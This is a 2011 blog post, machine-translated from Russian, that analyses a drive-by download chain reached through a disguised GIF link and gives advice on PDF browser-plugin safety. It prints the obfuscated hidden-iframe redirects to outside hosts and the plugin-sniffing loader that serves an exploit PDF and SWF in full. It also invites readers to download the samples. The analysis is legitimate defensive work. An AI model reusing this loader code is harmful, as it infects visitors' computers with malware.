Main » 2011 » Март » 16 » New old pdf exploit
12:53
New old pdf exploit
Ps2: In this topic there is no virus, although "avast" may seem otherwise (thanks edio)

It all started with an innocent message to icq from my good friend:
07/31/2009 18:45 : 11 xyz: see hxxp: / / watnhome.com / images / car.gif:)
Like anything suspicious. Well, I think it'll come. There render a BMW. In general, a rather pleasant. The picture is already loaded, and display the page load does not end there ... it worked for me as an alarming bell. I immediately poked Esc, then Ognelis stopped loading in the tab. With the thought that here we need to understand, I (with something) decided to see the source code of the picture. The idea is that there should be some kind of nonsense, as in any gif-jpeg image, BUT! Gorazno reality was more interesting. So, look in the browser source images:
view-source: hxxp: / / watnhome.com / images / car.gif
Wow! But that's just not the picture once.
<img Src="WorleyVision5.jpg">
<script type="text/javascript" src="js.js"> </ script>
So- so it's interesting that in JavaScript?
Look!
View-source: hxxp: / / watnhome.com / images / js.jsTam is easy nonsense:
document.write ('\ u003c \ u0069 \ u0066 \ u0072 \ u0061 \ u006d \ u0065 \ u0020 \ u0073 \ u0072 \ u0063 \ u003d \ u0022 \ u0068 \ u0074 \ u0074 \ u0070 \ u003a \ u002f \ u002f \ u006c \ u0069 \ u0073 \ u0074 \ u0065 \ u006e \ u007a \ u002e \ u006f \ u0072 \ u0067 \ u002f \ u0073 \ u0074 \ u0061 \ u0074 \ u0073 \ u002f \ u0072 \ u0075 \ u0031 \ u002e \ u0070 \ u0068 \ u0070 \ u0022 \ u0020 \ u0073 \ u0074 \ u0079 \ u006c \ u0065 \ u003d \ u0022 \ u0064 \ u0069 \ u0073 \ u0070 \ u006c \ u0061 \ u0079 \ u003a \ u006e \ u006f \ u006e \ u0065 \ u0022 \ u003e \ u003c \ u002f \ u0069 \ u0066 \ u0072 \ u0061 \ u006d \ u0065 \ u003e ') Or, translating into a more readable form ...
document.write ('<iframe src="hxxp://listenz.org/stats/ru1.php" style="display:none"> </ iframe>')

redirect. Well, do not get used, going further along the chain:
view-source: hxxp: / / listenz.org/stats/ru1.phpАга, greetings from the same author:
<script type = "text / javascript "> document.write ('\ u003c \ u0069 \ u0066 \ u0072 \ u0061 \ u006d \ u0065 \ u0020 \ u0073 \ u0072 \ u0063 \ u003d \ u0022 \ u0068 \ u0074 \ u0074 \ u0070 \ u003a \ u002f \ u002f \ u0076 \ u0065 \ u0072 \ u0069 \ u0076 \ u0065 \ u006c \ u006c \ u002e \ u0063 \ u006f \ u006d \ u002f \ u0075 \ u0070 \ u0064 \ u002f \ u0069 \ u006e \ u0064 \ u0065 \ u0078 \ u002e \ u0070 \ u0068 \ u0070 \ u0022 \ u0020 \ u0073 \ u0074 \ u0079 \ u006c \ u0065 \ u003d \ u0022 \ u0064 \ u0069 \ u0073 \ u0070 \ u006c \ u0061 \ u0079 \ u003a \ u006e \ u006f \ u006e \ u0065 \ u0022 \ u003e \ u003c \ u002f \ u0069 \ u0066 \ u0072 \ u0061 \ u006d \ u0065 \ u003e ') </ script> or a little more readable ...
<script type="text/javascript"> document.write (' < ; iframe src = "hxxp: / / verivell.com / upd / index.php" style = "display: none"> </ iframe >')</ script>

This is the end of the wicked chain :
view-source: hxxp: / / verivell.com / upd / index.php <script>
function PDF_SWF_Iframe (sCn)
{
  document.write (sCn);
}

if (navigator.userAgent.indexOf ('MSIE')! = -1)
{
  PDF = new Array ('AcroPDF.PDF', 'PDF.PdfCtrl ');
  for (i in PDF)
  {
    try
    {
      obj = new ActiveXObject (PDF [i]);

      if (obj )
      {
        PDF_SWF_Iframe ('<iframe src=evenLike.pdf> </ iframe>');
      }
    }

    catch (e) {}
  }

  try
  {
    obj = new ActiveXObject ('ShockwaveFlash.ShockwaveFlash');

    if (obj)
    {
      PDF_SWF_Iframe ( '<iframe src=normalDummyBelief.swf> </ iframe>');
    }
  }
  catch (e) {}
}

else
{
  for (i = 0; i <= navigator.plugins.length; i + +)
  {
    var plugin = navigator.plugins [i]. name;

    if ((plugin.indexOf ('Adobe Acrobat')! = -1) | | (plugin.indexOf ('Adobe PDF')! = -1))
    {
      PDF_SWF_Iframe ('<iframe src = evenLike.pdf> </ iframe> ');
    }

    if (plugin.indexOf (' Flash ')! = -1)
    {
      PDF_SWF_Iframe (' <iframe src=normalDummyBelief.swf> </ iframe> ');
    }
  }
}
</ script>

* This source code was highlighted with Source Code Highlighter.
So, welcome to the computer pdf (evenLike.pdf - infected Exploit.Win32.Pidief.bfz) and swf, our most beloved friends. I have not began to go further: these scripts and documents exploit fresh the July vulnerability (Topic Habre), the February, and perhaps older. If you remember, one time the network went a reference to the "viral video" on the site Alfastraha, which turned out to be viral without the quotation marks because it planted on your computer Trojan-Spy.Win32.Zbot.gkj.

Want to play? You can easily download these documents yourself and see what each is doing. If this is not enough, then there is another "example", but the author warns that 'This virus is srs business!' («The virus - no laughing matter").

So that, together with the site TechBytesDaily I urge you to opt out of pdf in the browser window, as would be convenient as it may seem. Always save pdf documents, and, if possible, to use free of charge is not as leaky analogues Adobe Acrobat (like Foxit Reader, Sumatra PDF). Unfortunately, the plugin from Adobe does not filter adequately get content before you pay to show it to the user in a browser.

And again about security: Be careful of confusing messages, even from familiar people, especially if it has a link to an unknown resource, and no personal commentary from the author.

P.s. In the http link hxxp corrected me on purpose.
Views: 573 | Added by: w1zard | Rating: 0.0/0
Total comments: 0
Имя *:
Email *:
Код *: